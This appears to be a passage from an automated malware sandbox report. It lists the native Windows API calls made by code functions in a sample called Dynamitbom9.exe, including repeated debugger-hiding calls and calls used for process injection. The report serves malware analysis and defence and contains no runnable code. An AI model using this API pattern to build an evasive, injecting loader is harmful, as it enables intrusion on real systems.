    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_0056083D NtSetInformationThread,10_2_0056083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_005680A5 NtSetInformationThread,10_2_005680A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_005681E5 NtSetInformationThread,10_2_005681E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_005682D5 NtSetInformationThread,10_2_005682D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00560ADD NtProtectVirtualMemory,10_2_00560ADD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567C17 NtSetInformationThread,10_2_00567C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567CC3 NtSetInformationThread,10_2_00567CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567DFF NtSetInformationThread,10_2_00567DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567E9B NtSetInformationThread,10_2_00567E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_0056076D NtSetInformationThread,10_2_0056076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567F37 NtSetInformationThread,10_2_00567F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 10_2_00567FE1 NtSetInformationThread,10_2_00567FE1
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A750 NtCreateFile,LdrInitializeThunk,12_2_1F47A750
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A700 NtProtectVirtualMemory,LdrInitializeThunk,12_2_1F47A700
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A720 NtResumeThread,LdrInitializeThunk,12_2_1F47A720
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A610 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_1F47A610
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A6A0 NtCreateSection,LdrInitializeThunk,12_2_1F47A6A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A540 NtDelayExecution,LdrInitializeThunk,12_2_1F47A540
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A560 NtQuerySystemInformation,LdrInitializeThunk,12_2_1F47A560
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A5F0 NtReadVirtualMemory,LdrInitializeThunk,12_2_1F47A5F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A410 NtQueryInformationToken,LdrInitializeThunk,12_2_1F47A410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A480 NtMapViewOfSection,LdrInitializeThunk,12_2_1F47A480
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A4A0 NtUnmapViewOfSection,LdrInitializeThunk,12_2_1F47A4A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A360 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_1F47A360
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A3E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_1F47A3E0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A240 NtReadFile,LdrInitializeThunk,12_2_1F47A240
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A2D0 NtClose,LdrInitializeThunk,12_2_1F47A2D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A710 NtQuerySection,12_2_1F47A710
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A780 NtOpenDirectoryObject,12_2_1F47A780
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A650 NtQueueApcThread,12_2_1F47A650
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A6D0 NtCreateProcessEx,12_2_1F47A6D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47BD40 NtSuspendThread,12_2_1F47BD40
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A520 NtEnumerateKey,12_2_1F47A520
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A5A0 NtWriteVirtualMemory,12_2_1F47A5A0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A460 NtOpenProcess,12_2_1F47A460
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47B470 NtOpenThread,12_2_1F47B470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A470 NtSetInformationFile,12_2_1F47A470
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47B410 NtOpenProcessToken,12_2_1F47B410
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A430 NtQueryVirtualMemory,12_2_1F47A430
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47ACE0 NtCreateMutant,12_2_1F47ACE0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A350 NtQueryValueKey,12_2_1F47A350
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A370 NtQueryInformationProcess,12_2_1F47A370
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A310 NtEnumerateValueKey,12_2_1F47A310
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A3D0 NtCreateKey,12_2_1F47A3D0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A260 NtWriteFile,12_2_1F47A260
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A220 NtWaitForSingleObject,12_2_1F47A220
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47BA30 NtSetContextThread,12_2_1F47BA30
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A2F0 NtQueryInformationFile,12_2_1F47A2F0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47A800 NtSetValueKey,12_2_1F47A800
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_1F47B0B0 NtGetContextThread,12_2_1F47B0B0
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567829 NtProtectVirtualMemory,12_2_00567829
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567C0A NtSetInformationThread,12_2_00567C0A
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_0056083D NtSetInformationThread,12_2_0056083D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_005680A5 NtSetInformationThread,12_2_005680A5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_005681E5 NtSetInformationThread,12_2_005681E5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_005682D5 NtSetInformationThread,12_2_005682D5
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00560ADD NtProtectVirtualMemory,12_2_00560ADD
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567C17 NtSetInformationThread,12_2_00567C17
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567CC3 NtSetInformationThread,12_2_00567CC3
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567DFF NtSetInformationThread,12_2_00567DFF
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567E9B NtSetInformationThread,12_2_00567E9B
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_0056076D NtSetInformationThread,12_2_0056076D
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567F37 NtSetInformationThread,12_2_00567F37
    Source: C:\Users\user\AppData\Local\Temp\THIO\Dynamitbom9.exeCode function: 12_2_00567FE1 NtSetInformationThread,12_2_00567FE1